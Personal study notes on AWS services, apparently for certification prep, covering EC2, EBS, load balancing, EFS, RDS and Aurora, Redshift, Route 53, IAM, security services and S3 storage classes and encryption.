  • VM Image
  • Locked to a region, but can be copied across regions
  • Types of AMIs:
    • Public (AWS Provided)
    • Private (created by you)
    • MarketPlace (3rd party vendor)

EBS Volume Types

  • Types:

    • gp2/gp3 (SSD): General purpose SSD volume. Balance price and performance
    • io1/io2 Block Express (SSD): Highest performance SSD volume for mission-critical low-latency or high-throughput workloads
    • st1 (HDD): Low cost HDD volume designed for frequently accessed, throughput-intensive workloads
      • Cannot be a boot volume
      • 125GB to 16 TB
    • sc1 (HDD): Lowest cost HDD volume designed for less frequently accessed workloads
  • Only GP2/GP3 and IO1/IO2 can be used as a boot volumes

  • With GP3, you can independently set IOPS and throughput. With GP2, they are linked together

Provisioned IOPS

  • Provisioned IOPS volumes are used for critical business applications with sustained IOPS performance
  • Great for database workloads
  • io1 Provisioned IOPS:
  • If you want to get over 32000 IOPS, you need Nitro 1 or Nitro 2

Auto Scaling Group (ASG)

  • Automatically scale out EC2 instances to meet traffic demand. You can scale based on a CloudWatch Alarm (metric), schedule,
  • Set a minimum capacity, desired capacity, and max capacity
  • The ASG itself is free
  • Create a launch template, which specifies how to launch instances within the ASG
  • Scaling Policies
    • Dynamic Scaling
      • Target Tracking Scaling
        • Simple, example: keep CPU usage around 50%
        • Target Tracking will create CloudWatch Alarms for you
      • Simple / Step Scaling
        • When a CloudWatch Alarm is triggered, add 2 instances
    • Scheduled Scaling
      • Scale based on a schedule
    • Predictive Scaling
      • Forecast load and scale ahead of time
  • Scaling cooldown (default 300 seconds). The ASG will not launch or terminate instances

Elastic Load Balancer

  • Spread load of traffic across multiple downstream instances
  • Health check downstream instances

  • SSL Termination
  • High Availability across zones
  • Add backend instances to a “Target Group”

Types of ELB

  • Application Load Balancer (Layer 7)

    • Allows you to route to multiple instances in a Target Group (aka Backend Pool in Azure)
    • Supports HTTP/2 and websocket
    • Route based on the path in the URL, hostname, query strings, and headers
    • Extra headers added by ALB
      • x-forwarded-for
      • x-forwarded-proto
      • x-forwarded-port
    • ALB has a WAF capability that can be enabled
  • Network Load Balancer (Layer 4)

    • High performance, millions of requests per second, and less latency ~100 ms
    • NLB has one static IP address per AZ, and supports assigning an Elastic IP
    • Not compatibly with the free tier
  • Gateway Load Balancer (Layer 3)

    • Use cases: Send all traffic to a firewall, IDS, IPS, etc.
    • Supports the GENEVE protocol on port udp/6081

Sticky Sessions

  • Same client is forwarded to the same instance, rather than spreading traffic amongst all instances
  • Supported by the ALB and NLB
  • Cookie is set on the client with has an expiration date you control
    • Cookies:
      • Two types of cookie are supported:
        • Application Based Cookie:
          • Custom cookie:
            • Generated by the target
            • Can include any custom attributes required by the application
            • The cookie name must be specified individually per target group
            • You cannot use AWSALB, AWSALBAPP, or AWSALBTG. These are all reserved by AWS
          • Application Cookie:
            • Generated by the LB itself
            • Cookie will be AWSALBAPP
        • Duration-based Cookie
          • Cookie is generated by the load balancer itself
          • Cookie name is AWSALB for ALB

Cross-Zone Load Balancing

  • Each load balancer instance distributes traffic evenly across all registered instances in all AZ
  • For the ALB, cross-zone load balancing can be enabled/disabled at the target group level. It is enabled by default and there are no additional charges
  • Can be enabled for NLB and GLB, but additional charges will apply. It is disabled by default.

SNI

  • Works with ALB, NLB, and CloudFront

Deregistration Delay

  • AKA Connection Draining
  • Stop sending new requests to the instance that is being deregistered
  • Allows the instance to complete in-flight requests before being terminated
  • 1 to 3600 seconds (default 300 seconds)
  • Can be disabled (set to 0 seconds)
  • Set to a low value if your requests are short-lived

Elastic File System (EFS)

Elastic File System (EFS)

  • Scalable, elastic, Cloud-Native NFS File System
  • Attach a single file system to multiple EC2 Instances
  • Don’t worry about running out or managing disk space

Introduction to Elastic File System (EFS)

  • EFS is a file storage service for EC2 instances
  • Storage capacity grows (upto petabytes) and shrinks automatically based on data stored (elastic)
  • Multiple EC2 instances in same VPC can mount a single EFS Volume (Volume must be in same VPC)
  • EC2 instances install the NFSv4.1 client and can then mount the EFS volume
  • EFS is using Network File System version 4 (NFSv4) protocol
  • EFS creates multiple mount targets in all your VPC subnets
  • Pay only for the storage you use, starting at $0.30 GB / month
  • You create a security group to control access to EFS
  • Encryption at rest using KMS
  • 1000s of concurrent NFS clients, 10 GB+ /s throughput
  • Grow to petabyte scale storage

EFS Performance Settings

  • Performance Mode
    • General Purpose (Default) - latency sensitive use cases
    • Max IO - higher latency, throughput, highly parallel
  • Throughput Mode:
    • Bursting - 1 TB storage = 50 MB/s + burst up to 100 MB/s
    • Enhanced - Provides more flexibility and higher throughput levels for workloads with a range of performance requirements
      • Provisioned - set your throughput regardless of storage size
      • Elastic - scale throughput up and down based on workload. Useful for unpredictable workloads

EFS Storage Tiers

  • Standard
  • Infrequent (EFS-IA)
  • Archive
  • Implement lifecycle policies to move files between tiers

What is ElastiCache for Redis?

What is ElastiCache for Redis?

  • ElastiCache is a web service that makes it easy to set up, manage and scale a distributed in-memory data store or cache environment in the cloud.
  • Features:
    • Automatic detection of and recovery from cache node failures
    • Multi-AZ for a failed primary cluster to a read replica in Redis cluster
    • Redis (cluster mode enabled) supports partitioning your data across up to 500 shards
  • ElastiCache works with both the Redis and Memcached engines.

Comparing Memcached and Redis

  • Redis supports:

    • Multi-AZ with Auto-Failover
    • Read replicas
    • data durability using AOF persistence
    • Backup and restore feautres
    • Supports sets and sorted sets
      • Sorted sets guarantees both uniqueness and element ordering. Useful when creating something like a gaming leaderboard. Each time a new element is added, its ordered automatically.
    • Supports IAM for authentication
  • Memcached support:

    • None of what Redis supports
    • Supports SASL based authentication

Authenticating with Redis AUTH command

  • Users enter a token (password) on a token-protected Redis server.
  • Include the parameter --auth-token (API: AuthToken) with the correct token to create the replication group or cluster.
  • Key Parameters:
    • --engine - Must be redis
    • –engine-version - Must be 3.2.6,4.0.10 or later
    • –transit-encryption-enabled - Required for authentication and HIPAA eligibility
    • –auth-token - Required for HIPAA eligibility. This value must be correct token for this token-protected Redis-server
    • –cache-subnet-group - Required fro HIPAA eligibility

Glue-cheatsheet

  • A fully managed service to extract, transform and load (ETL) your data for analytics

  • Discover and search across different AWS data sets without moving your data

  • AWS Glue retrieves data from sources and writes data to targets stored and transported in various data formats

    • If your data is stored or transported in Parquet data format, this document introduces you available features for using your data in AWS Glue
  • AWS glue consists of

    • Central metadata repository
    • ETL engine
    • Flexible scheduler
  • Use Cases:

    • Run queries against an Amazon S3 data lake
      • You can use AWS Glue to make your data available for analytics without moving your data
    • Analyze the log data in your data warehouse
      • Create ETL transcripts to transform, flatten and enrich the data from source to target
  • Integration with AWS Glue

    • To create database and table schema in the AWS Glue Data Catalog, you can run an AWS Glue crawler from within Athena on a data source, or you can run Data Definition Language (DDL) queries directly in the Athena Query Editor.
    • Then, using the database and table schema that you created, you can use Data Manipulation (DML) queries in Athena to query the data.
  • Set up AWS Glue Crawlers using S3 event notifications

AWS Lambda


AWS Lambda


  • Run code without thinking about servers or clusters
  • Run code without provisioning or managing infrastructure. Simply write and upload code as a .zip file or container image
  • Automatically respond to code execution requests at any scale, from a dozen events per day to hundreds of thousands per second
  • Save costs by paying only for the compute time you use by per millisecond instead of provisioning infrastructure upfront for peak capacity
  • Optimize code execution time and performance with the right function memory size. Respond to high demand in double-digit milliseconds with Provisioned Concurrency.

How it works


  • AWS Lambda is a serverless, event-driven compute service that lets you run code for virtually any type of application or backend service without provisioning or managing servers.
  • You can trigger Lambda over 200 AWS services and software as a service (Saas) applications and only pay for what you use

File Processing Architecture



Stream Processing Architecture



Use Cases


  • Quickly process data at scale
    • Meet resource-intensive and unpredictable demand by using AWS Lambda to instantly scale out to more than 18K vCPUs.
    • Build processing workflows quickly and easily with suite of other serverless offerings and event triggers
  • Run interactive web and mobile backends
  • Enable powerful ML insights
  • Create event-driven applications

Ml-models

What is Amazon QuickSight ?


What is Amazon QuickSight ?


  • Amazon Quicksight is a very fast, easy-to-use, cloud -powered business analytics service that makes it easy for all employees within an organization to build visualizations, perform ad-hoc analysis, and quickly get business insights from their data, anytime on any device.
  • 1/10th the cost of traditional BI Solutions
  • With QuickSight all users can meet varying analytic needs from the same source of truth through modern interactive dashboards, paginated reports, embedded analytics and natural language queries

Benefits


  • Pay only for what you use
  • Scale to tens of thousands of users
  • Easily embed analytics to differentiate your applications
  • Enable BI for everyone with QuickSight Q
  • Can get data insights in minutes from AWS services (e.g. Redshift, RDS, Athena, S3)
  • Can choose QuickSight to keep the data in SPICE up-yo-date as the data in the underlying sources change
  • SPICE :
    • Amazon QuickSight is built with SPICE - a super-fast, parallel, In-memory calculation Engine.
    • SPICE uses a combination of columnar storage, in-memory technologies enabled through the latest hardware innovations and machine code generation to run interactive queries on large datasets and get rapid responses

Aurora Cheatsheet


Aurora Cheatsheet


  • When you need a fully-managed Postgres or MySQL database that needs to scale, automate backups, high availability and fault tolerance think Aurora
  • Aurora can run MySQL or Postgres database engines
  • Aurora MySQL is 5x faster over regular MySQL
  • AUrora Postgres is 3x faster over regular Postgres
  • Aurora is 1/10 the cost over its competitors with similar performance and availability options
  • Aurora replicates 6 copies for your database across 3 availability zones
  • Aurora is allowed up to 15 Aurora Replicas
  • An Aurora database can span multiple regions via Aurora Global Database
  • Aurora Serverless allows you to stop and start Aurora and scale automatically while keeping costs low
  • Aurora Serverless is ideal for new projects or projects with infrequent database usage

RDS

RDS

  • Relational Database Service
  • Database service for database engines that use SQL as a query language
  • Engines:
    • Postgresql
    • Mysql / Mariadb
    • Oracle
    • MSSQL
    • IBM DB2
    • Aurora (Proprietary AWS Relational Database)
  • You cannot access the underlying compute instances for RDS unless you are using RDS Custom
    • RDS Custom supports Oracle and Microsoft SQL Server
  • RDS scales storage automatically
    • You have to set the Maximum Storage Threshold (max amount of storage to use)
    • Supports all RDS engines

Read Replicas

  • Scale out read operations
  • Create up to 15 read replicas within the same AZ or across AZ’s or across regions
  • Replication is asynchronous
  • You can promote a read-replica to it’s own database capable of full writes
  • Network Costs
    • If the read replicas is in the same region, there is no cost for replication traffic
    • For cross-region replication traffic, there is a cost
  • You can setup read-replicas as Multi-AZ for fault tolerance

RDS Multi-AZ

  • Mainly used for disaster recovery
  • synchronous replication to a standby database
  • One DNS name for both databases with automatic failover
  • Multi-AZ replicas cannot be read or written to until they are promoted to the primary instance
  • Converting from single-AZ to multi-AZ requires no downtime. This can be done in the “modify” section of the RDS database
    • A snapshot is taken and restored into a new standby database. Then a full sync of the database is initiated.

RDS Proxy

  • Fully managed database proxy for RDS
  • Allows apps to pool and share DB connections established with the database
  • Improving database efficiency by reducing the stress on database resources (e.g CPU, RAM)and minimize open connections (and timeouts)
  • Serverless, autoscaling, highly available (multi-AZ)
  • Reduced RDS and Aurora failover time by up 66%
  • Supports RDS (MySQL,PostgreSQL, MariaDB, MS SQL Server) and Aurora (MySQL, PostgreSQL)
  • No code changes required for most apps
  • Enforce IAM authentication for DB, and securely store credentials in AWS Secrets Manager
  • RDS proxy is never publicly accessible
  • RDS Proxy is useful for highly scaling lambda functions that open database connections

RDS Backups

  • Daily full backup of the database
  • Transaction logs are backed up every 5 minutes
  • 1 to 35 days of backup retention, set to 0 to disable

Aurora

  • Fully managed Postgres or MySQL compatible database designed by default to scale and fine-tuned to be really fast
  • Aurora automatically grows in increments of 10GB, up to 128 TB
  • 5x performance over MySQL, 3x performance over Postgres

Introduction to Aurora

  • Combines the speed and availability of high-end databases with the simplicity and cost-effectiveness of open source databases
  • Aurora can run either MySQL or Postgres compatible engines
  • Aurora MYSQL is 5x better performance than traditional MySQL
  • Aurora Postgres is 3x better performance than traditional Postgres
  • Aurora Costs more than RDS (20% more) but is more efficient

Aurora Availability

  • 6 copies of your data in 3 AZ:
    • Needs only 4 out of 6 copies for writes (so if one AZ is down then it is fine)
    • Need only 3 out of 6 for reads
    • self healing with peer-to-peer replication
    • Storage is striped across 100s of volumes
  • Automated failover for master happens in less than 30 seconds
  • Master + up to 15 Aurora Read Replicas serve reads. You can autoscale the read replicas. Clients connect to the “Reader Endpoint”, which will point to any of the read instances

Fault Tolerance and Durability

  • Aurora Backup and Failover is handled automatically

  • Aurora has a feature called Backtrack that allows you to restore to any point in time without restoring from backups

  • Snapshots of data can be shared with other AWS accounts

  • Storage is self-healing , in that data blocks and disks are continuously scanned for errors and repaired automatically

Aurora Replicas

Amazon Aurora ReplicasMysql Read Replicas
Number of ReplicasUp to 15Up to 5
Replication TypeAsynchronous(ms)Asynchronous (s)
Performance impact on primaryLowHigh
Act as failover targetYes (no data loss)Yes (potentially minutes of data loss)
Automated failoverYesNo
Support for user-defined replication delayNoYes
Support for different data or schema vs primaryNoYes

Aurora Serverless

  • Aurora except the database will automatically start up, shut down, and scale capacity up or down based on your application’s needs
  • Apps used a few minutes several times per day or week, eg. low-volume blog site
  • pay for database storage and the database capacity and I/O your database consumes while it is active

Aurora Backups

  • 1 to 35 days rention
  • Cannot be disabled
  • Point in time recovery
  • Manual snaphots
    • Retain manually created snapshots for any amount of time

Aurora Database Cloning

  • Clone an existing Aurora database into a new database
  • Uses copy-on-write, so it’s very fast

Amazon Redshift


Amazon Redshift


  • Fully managed Petabyte-size Data warehouse .
  • Analyze (Run complex SQL queries) on massive amounts of data Columnar Store database

What is Data Warehouse ?


  • What is Data Warehouse ?
    • A transaction symbolizes unit of work performed within a database management system
    • eg. reads and writes
DatabaseData warehouse
Online Transaction Processing (OLTP)Online Analytical Processing (OLAP)
A database was built to store current transactions and enable fast access to specific transactions for ongoing business processesA data warehouse is built to store large quantities of historical data and enable fast, complex queries across all the data
Adding Items to your Shopping ListGenerating Reports
Single SourceMultiple Source
Short transactions (small and simple queries ) with an emphasis on writes.Long transactions (long and complex queries ) with an emphasis on reads

Introduction to Redshift


  • AWS Redshift is the AWS managed, petabyte-scale solution for Data Warehousing
  • Pricing starts at just $0.25 per hour with no upfront costs or commitments.
  • Scale up to petabytes for $1000 per terabyte , per year
  • Redshift price is less than 1/10 cost of most similar services
  • Redshift is used for Business Intelligence
  • Redshift uses OLAP (Online Analytics Processing System)
  • Redshift is Columnar Storage Database
  • Columnar Storage for database tables is an important factor in optimizing analytic query performance because it drastically reduces the overall disk I/O requirements and reduces the amount of data you need to load from disk

Redshift Use Case


  • We want to continuously COPY data from

    1. EMR
    2. S3 and
    3. DynamoDB
    • to power a customer Business Intelligence tool
  • Using a third-party library we can connect and query Redshift for data.


Redshift Columnar Storage


  • Columnar Storage stores data together as columns instead of rows

  • OLAP applications look at multiple records at the same time. You save memory because you fetch just the columns of data you need instead of whole rows

  • Since data is stored via column, that means all data is of the same data-type allowing for easy compression


Redshift Configurations


  • Single Node
    • Nodes come in sizes of 160Gb. You can launch a single node to get started with Redshift
  • Multi-Node
    • You can launch a cluster of nodes with Multi Node mode
  • Leader Node
    • Manages client connections and receiving

DNS

DNS


  • Domain Name System which translates the human friendly hostnames into the machine IP addresses.
  • www.google.com =>172.217.18.36
  • Any zone costs 50 cents/month
  • Public vs Private hosted zones

Records TTL


  • TTL - Time to live
  • High TTL - e.g. 24 hr
    • less traffic on Route 53
    • Possibly outdated records
  • Low TTL - e.g. 60s
    • More traffic on Route 53 ($$)
    • Records are outdated for less time
    • Easy to change records
  • Except for Alias records, TTL is mandatory for each DNS record

CNAME vs Alias


  • AWS resources (Load Balancer, CLoudFront..) expose an AWS hostname:
    • lb l-1234.us-east-2.elb.amazonaws.com and you want myapp.mydomain.com
  • CNAME:
    • Points a hostname to any other hostname (app.domain.com => blabla.anything.com)
    • You cannot create a CNAME for the Apex record (root domain)
  • Alias:
    • Points a hostname to an AWS Resource (app.mydomain.com => blabla.amazonaws.com)
    • WORKS for ROOT DOMAIN and NON ROOT DOMAIN (aka, mydomain.com)
    • Free of charge
    • Native health check
    • Only supported for A and AAAA record types
    • Cannot set alias for an EC2 instance name

Routing Policies


  • Simple

    • Typically, the simple type of routing policy will resolve to a single resource
    • If the record resolves to multiple values, the client will choose a random one
    • When using the Alias record type, the record can only resolve to one resource
  • Weighted

    • Control the % of the requests that go to each specific resource.
    • Assign each record a relative weight
      • $ \text traffic {(%)} = {\displaystyle \text {weight for a specific record } \over \displaystyle \text {sum of all the weights for all records }} $
      • The sum of the weights of all records does not need to equal 100
    • DNS records must have the same name and type
    • Can be associated with Health Checks
    • Use cases: load balancing between regions, testing new application versions
  • Latency

    • Redirect to the resource that has the least latency close to us
    • Super helpful when latency for users is a priority
    • Latency is based on traffic between users and AWS Regions
    • Germany users may be directed to the US (if that’s the lowest latency)
    • Can be associated with Health Checks (has a failover capability)
  • Failover

  • Geolocation

    • Different from latency based
    • This routing is based on user location
    • Should create a “Default” record (in case there’s no match on location)
    • Use cases: website localization, restrict content distribution, load balancing
    • Can be associated with Health Checks
  • Geoproximity

    • Route traffic to your resources based on the location of users and resources
    • Ability to shift more traffic to resources based on the defined bias
    • To change the size of the geographic region, specify bias values:
      • To expand (1 to 99)- more traffic to the resource
      • To shrink (-1 to 99)- less traffic to the resource
    • Resources can be:
      • AWS resources (specify AWS region)
      • Non-AWS resources (specify Latitude and Longitude)
    • You must use Route 53 Traffic Flow to use this feature
  • Health Checks

    • HTTP Health Checks are only for public resources. You must create a CloudWatch Metric and associate a CloudWatch Alarm, then create a Health Check that checks the alarm
    • 15 global health checkers
    • Health checks methods:
      • Monitor an endpoint
        • Healthy/unhealthy threshold - 3 (default)
        • Interval 30 seconds
        • Supports HTTP, HTTPS, and TCP
        • if > 18% of health checkers report the endpoint is healthy, Route53 considers it healthy.
        • You can choose which locations you want Route53 to use
        • You must configure the firewall to allow traffic from the health checkers
      • Calculated Health Checks
        • Combine the results of multiple health checks into a single health check

Configuring Amazon Route 53 to route traffic to an S3 Bucket


  • An S3 bucket that is configured to host a static website
    • You can route traffic for a domain and its subdomains, such as example.com and www.example.com to a single bucket.
    • Choose the bucket that has the same name that you specified for Record name
    • The name of the bucket is the same as the name of the record that you are creating
    • The bucket is configured as a website endpoint

IAM

Groups

  • Groups can only contain users, not other groups

User Permissions

  • Permission Boundaries can be set for a user account. They control the maximum permissions for the user. This can be helpful to delegate permission management to other users.
  • Permissions can be defined on a user account using a built-in policy or by adding the user to a group with defined permissions
  • You can create an access key for a user that can be used to access AWS APIs via the CLI, an Application, third party service, etc.
  • Permission policies are defined in JSON documents known as IAM policies:
      {
          "Version": "2012-10-17",
          "Statement": [
              {
                  "Action": "ec2:*",
                  "Resource": "*",
                  "Effect": "Allow",
                  "Condition": {
                      "StringEquals": {
                          "ec2:Region": "us-east-2"
                      }
                  }
              }
          ]
      }
    
  • Modifying custom IAM policies creates a new version of that policy

Password Policy

  • You can define a password policy in IAM
  • Typical password policy settings

MFA

  • MFA Device Options
    • Virtual MFA Device
      • Google Authenticator
      • Authy
    • Universal 2nd Factor (U2F) Security Key
      • Yubikey
    • Hardware Key Fob
      • Provided By Gemalto (3rd party)
    • Hardware Device for AWS GovCloud
      • Provided by SurePassID

Roles

  • Used to provide access to AWS services
  • For example, provide an EC2 instance access to an S3 bucket

Security Tools in IAM

  • Credential Report: Generates a CSV file contains details about user accounts
  • Security Access Advisor: Accessible from an individual account in IAM. Shows what AWS services the AWS account is accessing.

AWS Certificate Manager

  • Integration with API Gateway
    • Create a custom domain name in API Gateway
    • For edge optimized API Gateways, The TLS certificate must be in the same region as CloudFront
    • For regional API Gateways, The TLS certificate must be imported on API gateway, in the same region as the API Gateway

AWS WAF (Web Application Firewall)

  • Protection at Layer 7 of the OSI Model
  • Can be deployed on ALB, CloudFront, API Gateway, AppSync GraphQL API, Cognito User Pool
  • After deploying the firewall, you create a Web ACL rule:
    • Filter based on IP address, HTTP Headers, HTTP body, URI strings, Message Size, geo-match, and rate-based rules
    • Web ACL’s are regional. Except for in CloudFront where they are global
  • How can we get a fixed IP while using WAF with ALB? Use a Global Accelerator in front of the ALB. The Global Accelerator will provide the static IP address, since an ALB cannot have a static IP.

AWS Shield

  • Protect from DDoS attacks
  • Standard and Advanced SKUs
    • Standard is free and included/enabled on all VPCs
    • Advanced is $3000/month per organization. Protection from more sophisticated DDoS attacks on EC2, ELB, CloudFront, Global Accelerator, and Route 53. Advanced also included 24/7 access to the DDoS Response Team. Shield Advanced will automatically create WAF rules for you.

AWS Firewall Manager

  • Manage rules for multiple firewalls in an AWS organization
  • Can be used with WAF
  • Policies are created at the regional level
  • Rules are applied to new resources when they are created automatically

GuardDuty

  • Use ML to protect your AWS account
  • Uses CloudTrail Event Logs, VPC Flow logs, and DNS Logs. Optional EKS audit logs, RDS and Aurora logs, EBS, Lambda, and S3 data events
  • Can setup EventBridge rules to be notified in case of findings.
  • Can protect against Crypto Currency attacks

Inspector

  • Automated security assessments on EC2 instances. Use AWS SSM Agent to scan the instance
  • Automated scans of container images pushed to ACR for CVEs
  • Lambda Functions can be scanned for vulnerabilities in code and package dependencies
  • Report findings in Security Hub or send findings via EventBridge

Macie

  • Use ML and pattern matching to discover and protect sensitive data in AWS in S3
  • Notify you through EventBridge when PII is found

Storage-cheatsheet

  • Simple Storage Service (S3) Object-based storage. Store unlimited amount of data without worry of underlying storage infrastructure
  • S3 replicates data across at least 3 AZs to ensure 99.99% Availability and 11’9s of durability
  • Objects contain data (they’re like files)
    • Objects can be size anywhere from 0 Bytes up to 5 Terabytes
  • Buckets contain objects. Buckets can also contain folders which can in turn can contain objects
  • Bucket names are unique across all AWS accounts. Like a domain name
  • When you upload a file to S3 successfully you’ll receive a HTTP 200 code . Lifecycle Management Objects can be moved between storage classes or objects can be deleted automatically based on schedule
  • Versioning Objects are given a Version ID. When new objects are uploaded the old objects are kept. You can access any object version. When you delete an object the previous object is restored. Once Versioning is turned on it cannot be turned off, only suspended.
  • MFA DELETE enforce DELETE operations to require MFA token in order to delete an object. Must have verioning turned on to use. Can only turn on MFA delete from the AWS CLI. Root Account is only allowed to delete objects
  • All new buckets are private by default Logging can be turned to on a bucket to log to track operations performed on objects
  • Access Control is configured using Bucket Policies and Access Control Lists (ACL)
  • Bucket Policies are JSON documents which let you write complex control access
  • ACLs are the legacy method (not depracated) where you grant access to objects and buckets with simple actions
  • Security in Transit Uploading is done over SSL
  • SSE stands for Server Side Encryption , S3 has 3 options for SSE
  • SSE-AES S3 handles the key, uses AES-256 algorithm
  • SSE-KMS Envelope encryption via AWS KMS and you manage the keys
  • SSE-C Customer provided key (you manage the key)
  • Client Side Encryption You must encrypt your own files before uploading them to S3
  • Cross Region Replication (CRR) allows you to replicate files across regions for greater durability.You must have versioning turned on in the source and destination bucket. You can have CRR replicate to bucket in another AWS account
  • Transfer Acceleration Provide faster and secure uploads from anywhere in the world. Data is uploaded via distinct url to an Edge location. Data is then transported to your S3 bucket via AWS backbone network.
  • Presigned Urls is a URL generated via the AWS CLI and SDK. It provides temporary access to write or download object data. Presigned URLs are commonly used to access private objects.
  • S3 has 6 different storage classes
    • Standard Fast 99.99% Availability, 11 9’s Durability. Replicated across at least three AZs
    • Intelligent Tiering Uses ML to analyze your object usage and determine the appropriate storage class. Data is moved to the most cost-effective access tier, without any performance impact or added overhead.
    • Standard Infrequently Accessed (IA) n Still fast! Cheaper if you access files less than once a month. Additional retrieval fee is applied. 50 % less than Standard (reduced availability )
    • One Zone IA Still fast! Objects only exist in one AZ. Availability (is 99.5%). but cheaper then standard IA by 20% less (Reduce durability ) Data could get destroyed. A retrieval fee is applied.
    • Glacier For long term cold storage. Retrieval of data can take minutes to hours but the off is very cheap storage
    • Glacier Deep Archive The lowest cost storage class. Data retrieval time is 12 hours

Introduction to S3


Introduction to S3


  • What is Object Storage (Object-based storage)?
  • data storage architecture that manages data as objects, as opposed to other storage architectures:
    • file systems: which manages data as files and fire hierarchy
    • block storage- which manages data as blocks within sectors and tracks
      • S3 provides with Unlimited storage
      • Need not think about underlying infrastructure
      • S3 console provides an interface for you to upload and access your data
      • Individual Object can be store form 0 Bytes to 5 Terabytes in size
      • Files larger than 5GB must be uploaded using multi-part upload. It’s recommended to use multi-part upload for files larger than 100MB
  • Baseline Performance
    • 3500 PUT/COPY/POST/DELETE or 5500 GET/HEAD requests per seconds per prefix in a bucket
    • There are no limits to the number of prefixes in a bucket
    • Example of a prefix
      • bucket/folder1/subfolder1/mypic.jpg => prefix is /folder1/subfolder1/
  • S3 Select
    • Use SQL like language to only retrieve the data you need from S3 using server-side filtering
S3 ObjectS3 Bucket
- Obejcts contain data(files)- Buckets hold objects
- They are like files- Buckets can have folders which can turn in hold objects
Object may consists of: - Key this is the name of the object - Value data itself is made up of sequence of bytes
- Version Id version of object (when versioning is enabled)
- Metadata additional information attached to the object
- S3 is universal namespace so domain names must be Unique (like having a domain name)

S3 Storage Classes


  • AWS offers a range of S3 Storage classes that trade Retrieval, Time, Accessability and Durability for Cheaper Storage

(Descending from expensive to cheaper)

  • S3 Standard (default)

    • Fast! 99.99 % Availability,
    • 11 9’s Durability. If you store 10,000,000 objects on S3, you can expect to lose a single object once every 10,000 years
    • Replicated across at least three AZs
      • S3 standard can sustain 2 concurrent facility failures
  • S3 Intelligent Tiering

    • Uses ML to analyze object usage and determine the appropriate storage class
    • Data is moved to most cost-effective tier without any performance impact or added overhead
  • S3 Standard-IA (Infrequent Access)

    • Still Fast! Cheaper if you access files less than once a month
    • Additional retrieval fee is applied. 50% less than standard (reduced availability)
    • 99.9% Availability
  • S3 One-Zone-IA

    • Still fast! Objects only exist in one AZ.
    • Availability (is 99.5%). but cheaper than Standard IA by 20% less
    • reduces durability
    • Data could be destroyed
    • Retrieval fee is applied
  • S3 Glacier Instant Retrieval

    • Millisecond retrieval, great for data accessed once a quarter
    • Minimum storage duration of 90 days
  • S3 Glacier Flexible Retrieval

    • data retrieval: Expedited (1 to 5 minutes), Standard (3 to 5 hours), Bulk (5 to 12 hours) - free
    • minimum storage duration is 90 days
    • Retrieval of data can take minutes to hours but the off is very cheap storage
  • S3 Glacier Deep Archive

    • The lowest cost storage class - Data retrieval time is 12 hours
    • standard (12 hours), bulk (48 hours)
    • Minimum storage duration is 180 days
  • S3 Glacier Intelligent Tiering


Storage class comparison


  • S3 Guarantees:
    • Platform is built for 99.99% availability
    • Amazon guarantee 99.99% availability
    • Amazon guarantees 11’9s of durability

S3 Security


  • All new buckets are PRIVATE when created by default

  • Logging per request can be turned on a bucket

  • Log files are generated and saved in a different bucket (can be stored in a bucket from different AWS account if desired)

  • Access control is configured using Bucket Policies and Access Control Lists (ACL)

  • User-Based Security

    • IAM Policies
    • An IAM principal can access an s3 object if the user IAM permissions allow it OR the resource policy allows it and there is no explicit deny
  • Resource-Based Security

    • Bucket Policies - Bucket wide rules from the S3 console

      • JSON based policy

          {
              "Version": "2012-10-17",
              "Statement": [{
                  "Sid": "AllowGetObject",
                  "Principal": {
                      "AWS": "*"
                  },
                  "Effect": "Allow",
                  "Action": "s3:GetObject",
                  "Resource": "arn:aws:s3:::DOC-EXAMPLE-BUCKET/*",
                  "Condition": {
                      "StringEquals": {
                          "aws:PrincipalOrgID": ["o-aa111bb222"]
                      }
                  }
              }]
          }
        
      • You can use the AWS Policy Generator to create JSON policies

    • Object ACL - finer grained

    • Bucket ACL - Less common


S3 Static Website Hosting

  • You must enable public reads on the bucket

S3 Encryption

  • 4 types of encryption in S3

    • Server side encryption with managed keys (SSE-S3)

      • Key is completely managed by AWS, you never see it
      • Object is encrypted server-side
      • Enabled by default
        • Uses AES-256, must set header "x-amz-server-side-encryption": "AES256"
    • Server side encryption with KMS keys stored in AWS KMS (SSE-KMS)

      • Manage the key yourself, store the key in KMS
      • You can audit the key use in CloudTrail
        • Uses AES-256, must set header "x-amz-server-side-encryption": "AWS:KMS"
      • Accessing the key counts toward your KMS Requests quota (5500, 10000, 30000 rps, based on region)
        • You can request a quota increase from AWS
    • Server Side Encryption with customer provided keys (SSE-C)

      • Can only be enabled/disabled from the AWS CLI
      • AWS doesn’t store the encryption key you provide
      • The ky must be passed as part of the headers with every request you make
      • HTTPS must be used
    • CSE (Client side encryption)

      • Clients encrypt/decrypt all the data before sending any data to S3
      • Customer fully managed the keys and encryption lifecycle
  • Encryption in Transit

    • Traffic between local host and S3 is achieved via SSL/TLS

S3 Objects

S3 Data Consistency

New Object (PUTS)Overwrite (PUTS) or Delete Objects (DELETES)
Read After Write ConsistencyEventual Consistency
When you upload a new S3 Object you are able to read immediately after writingWhen you overwrite or delete an object it takes time for S3 to replicate versions to AZs
If you were to read immediately, S3 may return you an old copy. You need to generally wait a few seconds before reading

S3 Cross-Region Replication or Same-Region Replication

  • When enabled, any object that is uploaded will be Automatically replicate to another region or from source to destination buckets

  • Must have versioning turned on both the source and destination buckets.

  • Can have CRR replicate to another AWS account

  • Replicate objects within the same region

  • You must give proper IAM permissions to S3

  • Buckets can be in different AWS accounts

  • Only new objects are replicated after enabling replication. To replicate existing objects, you must use S3 Batch Replication

  • For DELETE operations, you can optionally replicate delete markers. Delete Markers are not replicated by default.

  • To replicate, you create a replication rule in the “Management” tab of the S3 bucket. You can choose to replicate all objects in the bucket, or create a rule scope

S3 Versioning

  • allows to version the object

  • Stores all versions of an object in S3

  • Once enabled it cannot be disabled, only suspended on the bucket

  • Fully integrates with S3 Lifecycle rules

  • MFA Delete feature provides extra protection against deletion of your data

Lifecycle Management

  • Lifecycle Rule Actions

    • Move current objects between storage classes
    • Move noncurrent versions of objects between storage classes
    • Expire current versions of objects
    • Permanently delete noncurrent versions of objects
    • Delete Expired object delete markers or incomplete multi-part uploads
  • Automates the process of moving objects to different Storage classes or deleting objects all together

  • Can be used together with Versioning

  • Can be applied to both Current and previous versions

S3 Transfer Acceleration

  • Fast and secure transfer of files over long distances between your end users and an S3 bucket

  • Utilizes CloudFront’s distributed Edge locations

  • Instead of uploading to your bucket, users use a distinct URL for an Edge location

  • As data arrives at the Edge location it is automatically routed to S3 over a specially optimized network path. (Amazon’s backbone network)

  • Transfer acceleration is fully compatible with multi-part upload

Presigned URLs

